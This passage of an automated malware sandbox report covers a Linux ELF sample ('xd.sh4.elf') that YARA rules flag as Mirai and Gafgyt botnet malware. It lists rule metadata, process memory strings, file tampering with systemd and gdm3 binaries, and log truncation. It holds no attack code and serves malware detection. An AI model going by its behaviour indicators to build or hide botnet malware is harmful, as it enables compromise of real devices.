              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
              Source: 5425.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORYMatched rule: MAL_ELF_LNX_Mirai_Oct10_2 date = 2018-10-27, hash1 = fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9, author = Florian Roth, description = Detects ELF malware Mirai related, reference = Internal Research
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5414, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5419, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5421, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5423, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5425, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5427, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
              Source: Process Memory Space: xd.sh4.elf PID: 5430, type: MEMORYSTRMatched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
              Source: classification engineClassification label: mal100.spre.troj.evad.linELF@0/16@0/0

              Persistence and Installation Behavior

              barindex
              Source: /bin/fusermount (PID: 5586)File: /proc/5586/mountsJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/230/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/230/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/110/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/110/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/231/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/231/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/111/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/111/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/232/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/232/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/112/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/112/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/233/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/233/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/113/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/113/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/234/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/234/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/114/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/114/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/235/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/235/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/115/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/115/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/236/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/236/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/116/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/116/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/237/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/237/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/117/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/117/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/238/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/238/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/118/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/118/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/239/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/239/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/119/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/119/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/10/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/10/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/11/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/11/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/12/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/12/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/13/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/13/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/14/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/14/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5396/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5396/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/15/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/15/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5397/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5397/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/16/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/16/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/17/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/17/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/18/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/18/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/19/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/19/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/240/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/240/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3095/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3095/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/120/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/120/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/241/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/241/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/121/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/121/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/242/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/242/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/1/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/122/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/122/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/243/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/243/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/2/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/2/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/123/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/123/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/244/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/244/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/3/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/124/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/124/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/245/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/245/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/125/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/125/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/4/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/4/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/246/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/246/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/126/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/126/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/5/cmdlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/247/statusJump to behavior
              Source: /usr/bin/pkill (PID: 5562)File opened: /proc/247/cmdlineJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5545)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5547)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5549)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5551)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5553)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5555)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5557)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5559)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"Jump to behavior
              Source: /bin/sh (PID: 5546)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
              Source: /bin/sh (PID: 5548)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
              Source: /bin/sh (PID: 5550)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
              Source: /bin/sh (PID: 5552)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
              Source: /bin/sh (PID: 5554)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
              Source: /bin/sh (PID: 5556)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
              Source: /bin/sh (PID: 5558)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.confJump to behavior
              Source: /bin/sh (PID: 5560)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.confJump to behavior
              Source: /usr/share/gdm/generate-config (PID: 5562)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-serviceJump to behavior
              Source: /usr/sbin/gdm3 (PID: 5564)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /usr/sbin/gdm3 (PID: 5564)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5544)Log file created: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5596)Log file created: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5607)Log file created: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5617)Log file created: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5627)Log file created: /var/log/gpu-manager.log
              Source: /usr/bin/gpu-manager (PID: 5637)Log file created: /var/log/gpu-manager.logJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: /tmp/xd.sh4.elf (PID: 5417)File: /usr/lib/systemd/systemdJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)File: /usr/lib/systemd/systemd (deleted)Jump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)File: /usr/bin/pulseaudioJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5417)File: /usr/sbin/gdm3Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5544)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5596)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5607)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5617)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5627)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/gpu-manager (PID: 5637)Truncated file: /var/log/gpu-manager.logJump to behavior
              Source: /usr/bin/pulseaudio (PID: 5534)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /usr/bin/pkill (PID: 5562)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
              Source: /tmp/xd.sh4.elf (PID: 5414)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/pulseaudio (PID: 5534)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5544)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5596)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5607)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5617)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5627)Queries kernel information via 'uname': Jump to behavior
              Source: /usr/bin/gpu-manager (PID: 5637)Queries kernel information via 'uname': Jump to behavior
              Source: xd.sh4.elf, 5414.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5419.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5421.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5423.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5425.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5427.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5430.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sh4
              Source: xd.sh4.elf, 5414.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5419.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5421.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5423.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5425.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5427.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5430.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sh4
              Source: xd.sh4.elf, 5414.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5419.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5421.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5423.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5425.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5427.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmp, xd.sh4.elf, 5430.1.00007ffe8ba43000.00007ffe8ba64000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sh4/tmp/xd.sh4.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/xd.sh4.elf
              Source: xd.sh4.elf, 5414.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5419.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5421.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5423.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5425.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5427.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmp, xd.sh4.elf, 5430.1.00005555d5e4f000.00005555d5ed2000.rw-.sdmpBinary or memory string: UU5!/etc/qemu-binfmt/sh4

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: xd.sh4.elf, type: SAMPLE
              Source: Yara matchFile source: 5430.1.00007f0bb0400000.00007f0bb0414000.r-x.sdmp, type: MEMORY
